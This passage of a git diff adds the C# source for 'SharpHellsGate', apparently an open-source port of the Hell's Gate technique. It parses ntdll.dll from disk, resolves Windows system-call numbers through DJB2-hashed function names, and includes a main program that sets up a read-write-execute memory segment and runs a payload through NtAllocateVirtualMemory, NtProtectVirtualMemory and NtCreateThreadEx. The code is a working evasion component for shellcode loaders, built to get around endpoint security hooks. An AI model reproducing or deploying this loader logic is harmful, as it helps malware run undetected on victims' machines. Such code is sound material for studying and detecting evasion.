this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
this.ModuleStream.Read(s);
|
||||||
|
return BitConverter.ToUInt32(s);
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Extract a QWORD value from the memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="offset">The location of the QWORD in the memory stream.</param>
|
||||||
|
/// <returns>The value of the QWORD.</returns>
|
||||||
|
protected UInt64 ReadPtr64(Int64 offset) {
|
||||||
|
Span<byte> s = stackalloc byte[8];
|
||||||
|
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
this.ModuleStream.Read(s);
|
||||||
|
return BitConverter.ToUInt64(s);
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Extract a WORD value from the memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="offset">The location of the WORD in the memory stream.</param>
|
||||||
|
/// <returns>The value of the WORD.</returns>
|
||||||
|
protected UInt16 ReadUShort(Int64 offset) {
|
||||||
|
Span<byte> s = stackalloc byte[2];
|
||||||
|
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
this.ModuleStream.Read(s);
|
||||||
|
return BitConverter.ToUInt16(s);
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Extract an ASCII string from the memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="offset">The location of the ASCII string in the memory stream.</param>
|
||||||
|
/// <returns>The ASCII string.</returns>
|
||||||
|
protected string ReadAscii(Int64 offset) {
|
||||||
|
int length = 0;
|
||||||
|
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
while (this.ModuleStream.ReadByte() != 0x00)
|
||||||
|
length++;
|
||||||
|
|
||||||
|
Span<byte> s = length <= 1024 ? stackalloc byte[length] : new byte[length];
|
||||||
|
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
this.ModuleStream.Read(s);
|
||||||
|
return Encoding.ASCII.GetString(s);
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Extract the byte representation of a structure from the memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <typeparam name="T">The Type of the structure to extract from the memory stream.</typeparam>
|
||||||
|
/// <param name="offset">The location of the structure in the memory stream.</param>
|
||||||
|
/// <returns>The structure as byte span.</returns>
|
||||||
|
protected Span<byte> GetStructureBytesFromOffset<T>(Int64 offset) where T : struct {
|
||||||
|
Span<byte> s = stackalloc byte[Marshal.SizeOf<T>()];
|
||||||
|
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
this.ModuleStream.Read(s);
|
||||||
|
return s.ToArray();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get a specific amount of bytes at a specific location in the memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="offset">The location of the bytes to extract from the memory stream.</param>
|
||||||
|
/// <param name="size">The number of bytes to extract from the memory stream at a give location.</param>
|
||||||
|
/// <returns>The desired bytes as a byte span.</returns>
|
||||||
|
protected Span<byte> GetBytesFromOffset(Int64 offset, int size) {
|
||||||
|
Span<byte> s = size >= 1024 ? new byte[size] : stackalloc byte[size];
|
||||||
|
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||||
|
this.ModuleStream.Read(s);
|
||||||
|
return s.ToArray();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
@ -0,0 +1,328 @@
|
|||||||
|
using System;
|
||||||
|
using System.IO;
|
||||||
|
using SharpHellsGate.Win32;
|
||||||
|
using System.Collections.Generic;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.Linq;
|
||||||
|
|
||||||
|
namespace SharpHellsGate.Module {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Wrapper around the NTDLL module.
|
||||||
|
/// Used to extract structures and find system calls.
|
||||||
|
/// </summary>
|
||||||
|
public class SystemModule : MemoryUtil {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_DOS_HEADER structure of the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public Structures.IMAGE_DOS_HEADER ModuleDOSHeader { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_NT_HEADERS64 structure of the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public Structures.IMAGE_NT_HEADERS64 ModuleNTHeaders { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_SECTION_HEADER structure from the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public List<Structures.IMAGE_SECTION_HEADER> ModuleSectionHeaders { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_EXPORT_DIRECTORY structure from the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public Structures.IMAGE_EXPORT_DIRECTORY ModuleExportDirectory { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the IMAGE_EXPORT_DIRECTORY structure.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the exported functions' name.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryAddressNamesOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the exported functions' address.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryAddressFunctionsOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the exported functions' ordinal.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryAddressNameOrdinalesOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Name of the module. Will be NTDLL.
|
||||||
|
/// </summary>
|
||||||
|
public string ModuleName { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Path of the module. Will be %WINDIR%\System32\ntdll.dll
|
||||||
|
/// </summary>
|
||||||
|
public string ModulePath { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// .ctor
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="name">Name of the module</param>
|
||||||
|
public SystemModule(string name) : base() {
|
||||||
|
this.ModuleName = name;
|
||||||
|
this.ModulePath = $"{Environment.SystemDirectory}\\{name}";
|
||||||
|
this.ModuleSectionHeaders = new List<Structures.IMAGE_SECTION_HEADER>() { };
|
||||||
|
|
||||||
|
this.LoadModule();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Load the module into a memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <returns>Whether the loading process was a success.</returns>
|
||||||
|
public bool LoadModule() {
|
||||||
|
if (string.IsNullOrEmpty(this.ModuleName)) {
|
||||||
|
Util.LogError("Module name not provided");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!File.Exists(this.ModulePath)) {
|
||||||
|
Util.LogError($"Unable to find module: {this.ModuleName}");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
ReadOnlySpan<byte> ModuleBlob = File.ReadAllBytes(this.ModulePath);
|
||||||
|
if (ModuleBlob.Length == 0x00) {
|
||||||
|
Util.LogError($"Empty module content: {this.ModuleName}");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
base.ModuleStream = new MemoryStream(ModuleBlob.ToArray());
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Reload all structures.
|
||||||
|
/// </summary>
|
||||||
|
/// <returns>Whether all structures were successfully reloaded.</returns>
|
||||||
|
public bool LoadAllStructures() {
|
||||||
|
if (this.GetModuleDOSHeader(true).Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||||
|
return false;
|
||||||
|
|
||||||
|
if (this.GetModuleNTHeaders(true).Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||||
|
return false;
|
||||||
|
|
||||||
|
if (this.GetModuleSectionHeaders(true).Count != this.ModuleNTHeaders.FileHeader.NumberOfSections)
|
||||||
|
return false;
|
||||||
|
|
||||||
|
if (this.GetModuleExportDirectory(true).Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)))
|
||||||
|
return false;
|
||||||
|
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the _IMAGE_DOS_HEADERstructure from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||||
|
public Structures.IMAGE_DOS_HEADER GetModuleDOSHeader(bool ReloadCache = false) {
|
||||||
|
if (!this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)) && !ReloadCache)
|
||||||
|
return this.ModuleDOSHeader;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
this.ModuleDOSHeader = base.GetStructureFromBlob<Structures.IMAGE_DOS_HEADER>(0);
|
||||||
|
if (this.ModuleDOSHeader.e_magic != Macros.IMAGE_DOS_SIGNATURE) {
|
||||||
|
Util.LogError("Invalid DOS header signature");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
return this.ModuleDOSHeader;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the IMAGE_NT_HEADERS64 structure from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||||
|
public Structures.IMAGE_NT_HEADERS64 GetModuleNTHeaders(bool ReloadCache = false) {
|
||||||
|
if (!this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) && !ReloadCache)
|
||||||
|
return this.ModuleNTHeaders;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||||
|
this.GetModuleDOSHeader();
|
||||||
|
|
||||||
|
this.ModuleNTHeaders = base.GetStructureFromBlob<Structures.IMAGE_NT_HEADERS64>(this.ModuleDOSHeader.e_lfanew);
|
||||||
|
if (this.ModuleNTHeaders.Signature != Macros.IMAGE_NT_SIGNATURE) {
|
||||||
|
Util.LogError("Invalid NT headers signature");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
return this.ModuleNTHeaders;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get list of _IMAGE_SECTION_HEADER structures from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>The list of _IMAGE_SECTION_HEADER structures.</returns>
|
||||||
|
public List<Structures.IMAGE_SECTION_HEADER> GetModuleSectionHeaders(bool ReloadCache = false) {
|
||||||
|
if (this.ModuleSectionHeaders.Count == this.ModuleNTHeaders.FileHeader.NumberOfSections && !ReloadCache)
|
||||||
|
return this.ModuleSectionHeaders;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) || this.ModuleNTHeaders.FileHeader.Equals(default(Structures.IMAGE_FILE_HEADER)))
|
||||||
|
this.GetModuleNTHeaders();
|
||||||
|
|
||||||
|
for (Int16 cx = 0; cx < this.ModuleNTHeaders.FileHeader.NumberOfSections; cx++) {
|
||||||
|
Int64 iSectionOffset = this.GetModuleSectionOffset(cx);
|
||||||
|
|
||||||
|
Structures.IMAGE_SECTION_HEADER ImageSection = base.GetStructureFromBlob<Structures.IMAGE_SECTION_HEADER>(iSectionOffset);
|
||||||
|
if (!ImageSection.Equals(default(Structures.IMAGE_SECTION_HEADER)))
|
||||||
|
this.ModuleSectionHeaders.Add(ImageSection);
|
||||||
|
}
|
||||||
|
|
||||||
|
return this.ModuleSectionHeaders;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get a _IMAGE_SECTION_HEADER structure by name.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="name">The name of the section.</param>
|
||||||
|
/// <returns>The _IMAGE_SECTION_HEADER structure if exists.</returns>
|
||||||
|
public Structures.IMAGE_SECTION_HEADER GetModuleSectionHeaderByName(string name) {
|
||||||
|
if (name.Length > 8) {
|
||||||
|
Util.LogError("Invalid section name");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||||
|
this.GetModuleSectionHeaders();
|
||||||
|
|
||||||
|
return this.ModuleSectionHeaders.Where(x => x.Name.Equals(name, StringComparison.OrdinalIgnoreCase)).FirstOrDefault();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the Export Address Table (aka EAT) from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>the _IMAGE_EXPORT_DIRECTORY structure</returns>
|
||||||
|
public Structures.IMAGE_EXPORT_DIRECTORY GetModuleExportDirectory(bool ReloadCache = false) {
|
||||||
|
if (!this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)) && !ReloadCache)
|
||||||
|
return this.ModuleExportDirectory;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||||
|
this.GetModuleNTHeaders();
|
||||||
|
|
||||||
|
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||||
|
this.GetModuleSectionHeaders();
|
||||||
|
|
||||||
|
this.ModuleExportDirectoryOffset = this.ConvertRvaToOffset(this.ModuleNTHeaders.OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||||
|
this.ModuleExportDirectory = base.GetStructureFromBlob<Structures.IMAGE_EXPORT_DIRECTORY>(this.ModuleExportDirectoryOffset);
|
||||||
|
if (this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY))) {
|
||||||
|
Util.LogError("Invalid export address table (EAT).");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Parse all functions
|
||||||
|
this.ModuleExportDirectoryAddressNamesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNames);
|
||||||
|
this.ModuleExportDirectoryAddressFunctionsOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfFunctions);
|
||||||
|
this.ModuleExportDirectoryAddressNameOrdinalesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNameOrdinals);
|
||||||
|
return this.ModuleExportDirectory;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the address, name, system call for a given function hash.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="FunctionHash">DJB2 function hash.</param>
|
||||||
|
/// <returns></returns>
|
||||||
|
public Util.APITableEntry GetAPITableEntry(UInt64 FunctionHash) {
|
||||||
|
if (this.ModuleExportDirectoryAddressNamesOffset == 0x00 || this.ModuleExportDirectoryAddressFunctionsOffset == 0x00|| this.ModuleExportDirectoryAddressNameOrdinalesOffset == 0x00)
|
||||||
|
this.GetModuleExportDirectory();
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
Util.APITableEntry Entry = new Util.APITableEntry {
|
||||||
|
Hash = FunctionHash
|
||||||
|
};
|
||||||
|
|
||||||
|
for (Int32 cx = 0; cx < this.ModuleExportDirectory.NumberOfNames; cx++) {
|
||||||
|
UInt32 PtrFunctionName = base.ReadPtr32(this.ModuleExportDirectoryAddressNamesOffset + (sizeof(uint) * cx));
|
||||||
|
string FunctionName = base.ReadAscii(this.ConvertRvaToOffset(PtrFunctionName));
|
||||||
|
|
||||||
|
if (FunctionHash == Util.GetFunctionDJB2Hash(FunctionName)) {
|
||||||
|
UInt32 PtrFunctionAdddress = base.ReadPtr32(this.ModuleExportDirectoryAddressFunctionsOffset + (sizeof(uint) * (cx + 1)));
|
||||||
|
Span<byte> opcode = base.GetFunctionOpCode(this.ConvertRvaToOffset(PtrFunctionAdddress));
|
||||||
|
|
||||||
|
if (opcode[3] == 0xb8 && opcode[18] == 0x0f && opcode[19] == 0x05) {
|
||||||
|
Entry.Name = FunctionName;
|
||||||
|
Entry.Address = PtrFunctionAdddress;
|
||||||
|
Entry.Syscall = (Int16)(((byte)opcode[5] << 4) | (byte)opcode[4]);
|
||||||
|
return Entry;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the offset of a _IMAGE_SECTION_HEADER structure.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="cx">The section to get.</param>
|
||||||
|
/// <returns>The _IMAGE_SECTION_HEADER structure.</returns>
|
||||||
|
private Int64 GetModuleSectionOffset(Int16 cx)
|
||||||
|
=> this.ModuleDOSHeader.e_lfanew
|
||||||
|
+ Marshal.SizeOf<Structures.IMAGE_FILE_HEADER>()
|
||||||
|
+ this.ModuleNTHeaders.FileHeader.SizeOfOptionalHeader
|
||||||
|
+ sizeof(Int32) // sizeof(DWORD)
|
||||||
|
+ (Marshal.SizeOf<Structures.IMAGE_SECTION_HEADER>() * cx);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Convert a relative virtual address (RVA) into an offset.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||||
|
/// <param name="SectionHeader">The section in which the relative virtual address (RVA) points to.</param>
|
||||||
|
/// <returns>The offset.</returns>
|
||||||
|
private Int64 ConvertRvaToOffset(Int64 rva, Structures.IMAGE_SECTION_HEADER SectionHeader) => rva - SectionHeader.VirtualAddress + SectionHeader.PointerToRawData;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Convert a relative virtual address (RVA) into an offset.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||||
|
/// <returns>The offset.</returns>
|
||||||
|
private Int64 ConvertRvaToOffset(Int64 rva) => this.ConvertRvaToOffset(rva, GetSectionByRVA(rva));
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get which image section is which a relative virtual address (RVA) points to.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="rva">The RVA</param>
|
||||||
|
/// <returns>The _IMAGE_SECTION_HEADER structure</returns>
|
||||||
|
private Structures.IMAGE_SECTION_HEADER GetSectionByRVA(Int64 rva) => this.ModuleSectionHeaders.Where(x => rva > x.VirtualAddress && rva <= x.VirtualAddress + x.SizeOfRawData).First();
|
||||||
|
}
|
||||||
|
}
|
51
Hells Gate/C# Implementation/SharpHellsGate/Program.cs
Normal file
51
Hells Gate/C# Implementation/SharpHellsGate/Program.cs
Normal file
@ -0,0 +1,51 @@
|
|||||||
|
using System;
|
||||||
|
using System.Collections.Generic;
|
||||||
|
using SharpHellsGate.Module;
|
||||||
|
|
||||||
|
namespace SharpHellsGate {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Main class.
|
||||||
|
/// </summary>
|
||||||
|
public class Program {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Entry point of the program.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="args">Command line arguments.</param>
|
||||||
|
static void Main(string[] args) {
|
||||||
|
Util.LogInfo("Copyright (C) 2020 Paul Laine (@am0nsec)");
|
||||||
|
Util.LogInfo("C# Implementation of the Hell's Gate VX Technique");
|
||||||
|
Util.LogInfo(" --------------------------------------------------\n", 0, "");
|
||||||
|
|
||||||
|
// Only works for x86
|
||||||
|
if (IntPtr.Size != 8) {
|
||||||
|
Util.LogError("Project only tested in x64 context.\n");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Load the module and get everything ready
|
||||||
|
SystemModule ntdll = new SystemModule("ntdll.dll");
|
||||||
|
ntdll.LoadAllStructures();
|
||||||
|
|
||||||
|
// Resolve all the system calls
|
||||||
|
Dictionary<UInt64, Util.APITableEntry> APITable = new Dictionary<ulong, Util.APITableEntry>() {
|
||||||
|
{ Util.NtAllocateVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtAllocateVirtualMemoryHash) },
|
||||||
|
{ Util.NtProtectVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtProtectVirtualMemoryHash) },
|
||||||
|
{ Util.NtCreateThreadExHash, ntdll.GetAPITableEntry(Util.NtCreateThreadExHash) },
|
||||||
|
{ Util.NtWaitForSingleObjectHash, ntdll.GetAPITableEntry(Util.NtWaitForSingleObjectHash) }
|
||||||
|
};
|
||||||
|
ntdll.Dispose();
|
||||||
|
|
||||||
|
Util.LogInfo($"NtAllocateVirtualMemory: 0x{APITable[Util.NtAllocateVirtualMemoryHash].Syscall:x4}");
|
||||||
|
Util.LogInfo($"NtProtectVirtualMemory: 0x{APITable[Util.NtProtectVirtualMemoryHash].Syscall:x4}");
|
||||||
|
Util.LogInfo($"NtWaitForSingleObject: 0x{APITable[Util.NtWaitForSingleObjectHash].Syscall:x4}");
|
||||||
|
Util.LogInfo($"NtCreateThreadEx: 0x{APITable[Util.NtCreateThreadExHash].Syscall:x4}\n");
|
||||||
|
|
||||||
|
HellsGate gate = new HellsGate(APITable);
|
||||||
|
gate.GenerateRWXMemorySegment();
|
||||||
|
gate.Payload();
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
@ -0,0 +1,18 @@
|
|||||||
|
<Project Sdk="Microsoft.NET.Sdk">
|
||||||
|
|
||||||
|
<PropertyGroup>
|
||||||
|
<OutputType>Exe</OutputType>
|
||||||
|
<TargetFramework>net5.0</TargetFramework>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
|
||||||
|
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||||
|
<PlatformTarget>x64</PlatformTarget>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
|
||||||
|
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||||
|
<PlatformTarget>x64</PlatformTarget>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
</Project>
|
128
Hells Gate/C# Implementation/SharpHellsGate/Util.cs
Normal file
128
Hells Gate/C# Implementation/SharpHellsGate/Util.cs
Normal file
@ -0,0 +1,128 @@
|
|||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
|
||||||
|
namespace SharpHellsGate {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Util class. Used mainly for debug output.
|
||||||
|
/// </summary>
|
||||||
|
public class Util {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Structure used to store the name, address, system call and hash of a native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
public struct APITableEntry {
|
||||||
|
public string Name;
|
||||||
|
public Int64 Address;
|
||||||
|
public Int16 Syscall;
|
||||||
|
public UInt64 Hash;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// DJB2 Hash of the NtAllocateVirtualMemory function name.
|
||||||
|
/// </summary>
|
||||||
|
public static UInt64 NtAllocateVirtualMemoryHash { get; } = 0xf5bd373480a6b89b;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// DJB2 Hash of the NtProtectVirtualMemory function name.
|
||||||
|
/// </summary>
|
||||||
|
public static UInt64 NtProtectVirtualMemoryHash { get; } = 0x858bcb1046fb6a37;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// DJB2 Hash of the NtCreateThreadEx function name.
|
||||||
|
/// </summary>
|
||||||
|
public static UInt64 NtCreateThreadExHash { get; } = 0x64dc7db288c5015f;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// DJB2 Hash of the NtWaitForSingleObject function name.
|
||||||
|
/// </summary>
|
||||||
|
public static UInt64 NtWaitForSingleObjectHash { get; } = 0xc6a2fa174e551bcb;
|
||||||
|
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Log an informational information.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="msg">Message to log.</param>
|
||||||
|
/// <param name="indent">Indentation level.</param>
|
||||||
|
/// <param name="prefix">Message prefix.</param>
|
||||||
|
public static void LogInfo(string msg, int indent = 0, string prefix = "[>]") {
|
||||||
|
#if DEBUG
|
||||||
|
if (string.IsNullOrEmpty(msg))
|
||||||
|
return;
|
||||||
|
|
||||||
|
LogMessage(msg, prefix, indent, ConsoleColor.Blue);
|
||||||
|
#endif
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Log an error information.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="msg">Message to log.</param>
|
||||||
|
/// <param name="indent">Indentation level.</param>
|
||||||
|
/// <param name="prefix">Message prefix.</param>
|
||||||
|
public static void LogError(string msg, int indent = 0, string prefix = "[-]") {
|
||||||
|
#if DEBUG
|
||||||
|
if (string.IsNullOrEmpty(msg))
|
||||||
|
return;
|
||||||
|
|
||||||
|
LogMessage(msg, prefix, indent, ConsoleColor.Red);
|
||||||
|
#endif
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Log a success information.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="msg">Message to log.</param>
|
||||||
|
/// <param name="indent">Indentation level.</param>
|
||||||
|
/// <param name="prefix">Message prefix</param>
|
||||||
|
public static void LogSuccess(string msg, int indent = 0, string prefix = "[+]") {
|
||||||
|
#if DEBUG
|
||||||
|
if (string.IsNullOrEmpty(msg))
|
||||||
|
return;
|
||||||
|
|
||||||
|
LogMessage(msg, prefix, indent, ConsoleColor.Green);
|
||||||
|
#endif
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Log a string to the console and to the debugger.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="msg">Message to log.</param>
|
||||||
|
/// <param name="indent">Indentation level.</param>
|
||||||
|
/// <param name="prefix">Message prefix.</param>
|
||||||
|
/// <param name="color">The color of the prifix on the console.</param>
|
||||||
|
private static void LogMessage(string msg, string prefix, int indent, ConsoleColor color) {
|
||||||
|
// Indent
|
||||||
|
Console.Write(new String(' ', indent));
|
||||||
|
Trace.Write(new String(' ', indent));
|
||||||
|
|
||||||
|
// Color and prefix
|
||||||
|
Trace.Write(prefix);
|
||||||
|
Console.ForegroundColor = color;
|
||||||
|
Console.Write(prefix);
|
||||||
|
Console.ResetColor();
|
||||||
|
|
||||||
|
// Message
|
||||||
|
Console.WriteLine($" {msg}");
|
||||||
|
Trace.WriteLine($" {msg}");
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Revisited DJB2 algorithm.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="FunctionName">The ASCII name of a function.</param>
|
||||||
|
/// <returns>The djb2 hash of the function name.</returns>
|
||||||
|
public static UInt64 GetFunctionDJB2Hash(string FunctionName) {
|
||||||
|
if (string.IsNullOrEmpty(FunctionName))
|
||||||
|
return 0;
|
||||||
|
|
||||||
|
UInt64 hash = 0x7734773477347734;
|
||||||
|
foreach (char c in FunctionName)
|
||||||
|
hash = ((hash << 0x5) + hash) + (byte)c;
|
||||||
|
|
||||||
|
return hash;
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
@ -0,0 +1,93 @@
|
|||||||
|
using System;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
|
||||||
|
namespace SharpHellsGate.Win32 {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Contains all the delegates used to execute the system calls.
|
||||||
|
/// </summary>
|
||||||
|
public class DFunctions {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||||
|
